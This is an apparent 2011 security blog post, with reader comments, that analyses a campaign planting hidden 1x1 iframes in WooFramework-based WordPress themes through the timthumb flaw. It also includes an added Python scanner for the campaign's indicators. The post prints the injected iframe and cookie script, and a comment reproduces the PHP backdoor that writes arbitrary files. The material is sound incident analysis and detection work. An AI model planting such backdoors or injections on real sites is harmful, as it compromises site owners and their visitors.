
Hackers target unpatched WooFramework

   24 Aug 11   Filed in Short Attack Reviews

When Michael VanDeMar mentioned the malicious “googlesafebrowsing .com” domain, I decided to check how exactly it was used in malware attacks. It’s quite a popular trick to mimic Google’s own domains to make malicious code look legitimate. I have a “collection” of several dozen misspelled Google Analytics domains alone that were used for malware distribution. In this case, the domain name was made up rather than misspelled. It refers to Google’s Safe Browsing project and its diagnostic pages, which actually use the google.com domain (as do most other Google services).

Just a few searches and I figured out that the malicious URL was googlesafebrowsing .com/kwizhveo.php. The next step was to find infected sites and the malicious code that used that URL.

Bing somehow found that URL, so there should be backlinks. I decided to check the URL using MajesticSEO Site Explorer (you can use it to check backlinks to particular URLs as well as to whole domains). Bingo! The Site Explorer returned 10,453 backlinks (exactly to kwizhveo.php) from 360 unique domains.

When I checked the pages, I didn’t find any references to googlesafebrowsing .com, but all of them contained hidden iframes that opened kwizhveo.php on a different domain: hxxp://prettymiistmen .us .to/kwizhveo.php. I used a search and found one more domain with the kwizhveo.php URL: hxxp://musiictochapman .us .to/kwizhveo .php. MajesticSEO returned almost the same backlinks for this URL. It was obviously the same attack; it had just updated the injected code and used new disposable domains.

For example, the googlesafebrowsing .com domain was registered on Aug 17th, 2011 and was in use for two days only: Aug 19-20.

googlesafebrowsing history

Then I watched the infected sites for a day, and during the day, the iframe URL changed several times. This happened synchronously on all infected sites.

  • hxxp://sexyjju88 .us .to/kwizhveo.php
  • hxxp://freemii69 .us .to/kwizhveo.php
  • hxxp://heidiheernande .us .to/kwizhveo.php
  • hxxp://blaackhatt58 .us .to/kwizhveo.php
  • hxxp://gufmaurr79 .us .to/kwizhveo.php
  • hxxp://freeagcoll .us .to/kwizhveo.php
  • hxxp://prettyrosseande .us .to/kwizhveo.php
  • hxxp://coolerikpowwel .us .to/kwizhveo.php
  • hxxp://cooldeliia97 .us .to/kwizhveo.php
  • hxxp://bastalevarrga .us .to/kwizhveo.php
  • hxxp://seveende98 .us .to/kwizhveo.php
  • hxxp://statcounter .com/kwizhveo.php

WooFramework

Let’s get back to the infected sites. All 372 infected sites that I found via MajesticSEO are WordPress blogs (I guess there may be more infected sites). And it was easy to notice that almost all of them used themes built upon various versions of WooFramework, the engine behind all popular premium WooThemes. Here’s how it looks in Unmask Parasites reports.

infected sites that use WooFramework

Timthumb.php vulnerability

As with most of the recent WordPress hacks, I believe the timthumb vulnerability was the attack vector in this case too. WooFramework uses this file. They know about the problem. Moreover, they patched their framework at the beginning of August (WooFramework v4.4.2) and began to notify webmasters who used vulnerable versions of their themes via the WordPress Dashboard. Apparently, not all webmasters listened to them and left their themes unpatched.

Malicious code

The injected iframe code looks like this:

<ifr ame src="hxxp://freemii69. us .to/ kwizhveo.php" width="1" height="1" frameborder="0">
</iframe>

The iframe is always bundled with some strange and rather pointless JavaScript code that calls itself “WordPress Counter” (any ideas what the purpose of this code is besides making the iframe tag less prominent?):

<!-- WordPress Counter -->
<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
</script>
<ifr ame src="hxxp://freemii69 .us .to/kwizhveo .php" width="1" height="1" frameborder="0">
</iframe>
<!-- WordPress Counter -->

The placement of the code suggests that it must have been injected into WordPress theme files. Most likely into header.php.

Malware detection

In my case, the malicious iframe tried to push some Java exploit (ardmbsesalkt.jar). It only happens when you visit the infected page for the first time.

None of the 372 domains in my list are currently blacklisted by Google. And the currently used malicious domains are not blacklisted either. So don’t rely on your browser and Google. If you use Firefox, the NoScript extension is your best friend.

To webmasters of WordPress blogs

If you use WooThemes, make sure to upgrade your WooFramework ASAP!

Even if you don’t use WooThemes, check whether any of your themes or plugins use timthumb.php (or thumb.php). If you find such themes and/or plugins, you should upgrade them ASAP. If there are no available updates that patch the timthumb vulnerability, you should update the timthumb.php file yourself. You can get it here: http://code.google.com/p/timthumb/.

It is not enough to remove the malicious code from your files. Most likely hackers uploaded multiple backdoor files to your server. To stop the attack, you should find and remove all of them.
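A defender’s file scan for the indicators described in this post (the “WordPress Counter” wrapper with its MTPT cookie, the hidden 1x1 iframe loading kwizhveo.php, every copy of timthumb.php/thumb.php, and the file-writing backdoor a commenter posted below), as an added Python example that is not part of the original post. The sample files it scans are constructed, and the disposable.invalid domain is a placeholder.

```python
import os
import re
import tempfile
# Constructed samples (not a real site): "WordPress Counter" iframe in header.php, backdoor in thumb.php.
SAMPLE_FILES = {
    "wp-content/themes/example/header.php": (
        '<head>\n<!-- WordPress Counter -->\n<script language="javascript">\n'
        'SetCookie("MTPT","1",ExpDate, "/");\n</script>\n'
        '<iframe src="http://disposable.invalid/kwizhveo.php" width="1" height="1" '
        'frameborder="0"></iframe>\n<!-- WordPress Counter -->\n</head>\n'
    ),
    "wp-content/themes/example/thumb.php": (
        '<?php\n$p=$_POST;\nif (isset ($p["n"])) {\n$f=@fopen($p["n"], "w");\n'
        '@fputs($f,base64_decode($p["c"]));\n@fclose($f);\ndie();\n}\n'
    ),
    "wp-content/themes/example/footer.php": "<?php wp_footer(); ?>\n",  # clean file
}

# Indicators from the post: marker comment, 1x1 iframe to kwizhveo.php, MTPT cookie, fopen+base64 write.
INDICATORS = {
    "wordpress-counter-marker": re.compile(r"<!--\s*WordPress Counter\s*-->"),
    "hidden-iframe-kwizhveo": re.compile(r'<iframe[^>]*kwizhveo\.php[^>]*width="1"', re.I),
    "mtpt-cookie": re.compile(r'SetCookie\("MTPT"'),
    "base64-file-write": re.compile(r"fopen\(\$p\[.*?\].*?base64_decode", re.S),
}
TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}  # every copy needs a version check

def scan_tree(root):
    # Walk a WordPress install and return {relative path: [indicator names]}.
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            hits = ["timthumb-copy"] if name.lower() in TIMTHUMB_NAMES else []
            with open(path, encoding="utf-8", errors="replace") as fh:
                data = fh.read()
            hits += [tag for tag, rx in INDICATORS.items() if rx.search(data)]
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def demo():
    # Write the constructed samples to a temp dir, scan it, normalise path separators.
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return {r.replace(os.sep, "/"): h for r, h in scan_tree(tmp).items()}
```

Point scan_tree at the site root (e.g. wp-content) to list files worth a manual look; a hit on a timthumb copy means comparing it against the patched release, and a clean header.php says nothing about whether the uploaded backdoors are gone.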

Sidenote: One of the hacked sites that contained the malicious “GoogleSafeBrowsing .com” iframe (and still contains newer variants of that iframe) is the InsideGoogle.com blog that aims to educate the public and opinion leaders about Google’s dangerous dominance over the Internet, computing and our online lives. Now they can use one more argument: the dominance of Google’s services allows cybercriminals to mask their activity using Google-like domain names ;-)

If you have any additional information about this attack, please share it in the comments below.

Reader's Comments (9)

  1.

    Very good post :) We just posted about it as well. That domain now is being used to control what to display:

    hxxp://googlesafebrowsing .com/remoted.cc.txt

    I posted the full code added to the header.php here:

    http://blog.sucuri.net/2011/08/timthumb-php-attacks-now-using-googlesafebrowsing-com.html

    thanks,

    •

      Thanks David,

      Now I see what’s the point in that cookie code. The malicious code is only supposed to be injected for new and not logged in (e.g. blog owner) visitors.

      And I was right about the header.php file.

      What I see is that the malicious code saves the domain name in the WordPress database and tries to update it (from hxxp://googlesafebrowsing .com/remoted.cc.txt) every 10 minutes. Correct?

  2.

    How long does it take for the Google Malware warnings and such to disappear after the exploit has been removed?

    I’ve followed the instructions, have removed the injected code from the header.php file, the thumb.php file had this added to it:

    $p=$_POST;
    // "t": liveness check, the controller confirms the backdoor still answers
    if (isset ($p["t"])) {
        echo "Test "."OK";
        die();
    }
    // "d": clean-up, deletes every .php file from the timthumb cache directory
    elseif (isset ($p["d"])) {
        $cdir = scandir("cache");
        foreach ($cdir as $dd) {
            if (stripos($dd, ".php") !== false)
                unlink ("cache/".$dd);
        }
        die();
    }
    // "n" and "c": arbitrary file write, base64-decoded "c" is written to the path in "n"
    elseif (isset ($p["n"])) {
        $f=@fopen($p["n"], "w");
        @fputs($f,base64_decode($p["c"]));
        @fclose($f);
        die();
    }

    Anyhow, replaced thumb.php with the updated version as well.

    Still, this was a couple hours ago. The Google Malware warning is still present on this site. Will this continue to happen until Google crawls the site again or does that mean the exploit / whatever is still active?

    Thanks for the information

  3.

    What happened when Google visited this site?

    Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-24, and the last time suspicious content was found on this site was on 2011-08-24.

    Malicious software is hosted on 2 domain(s), including freeagcoll.us.to/, prettyrosseande.us.to/.

    That’s the message I still get.

  4.

    Well, I got hacked and Google flagged me…no idea how to fix it and no idea what to do but at least I know what is wrong…lol.

  5.

    By the way I got NO WARNING from WooThemes whatsoever.

    •

      I’m not familiar with the internals of WooFramework. You must be using an old version that doesn’t support update notifications.

  6.

    I use a wootheme and wasn’t notified. I am diligent about keeping my plugins, themes, wordpress updated.

    I was hacked yesterday :(

    Working on cleaning it up.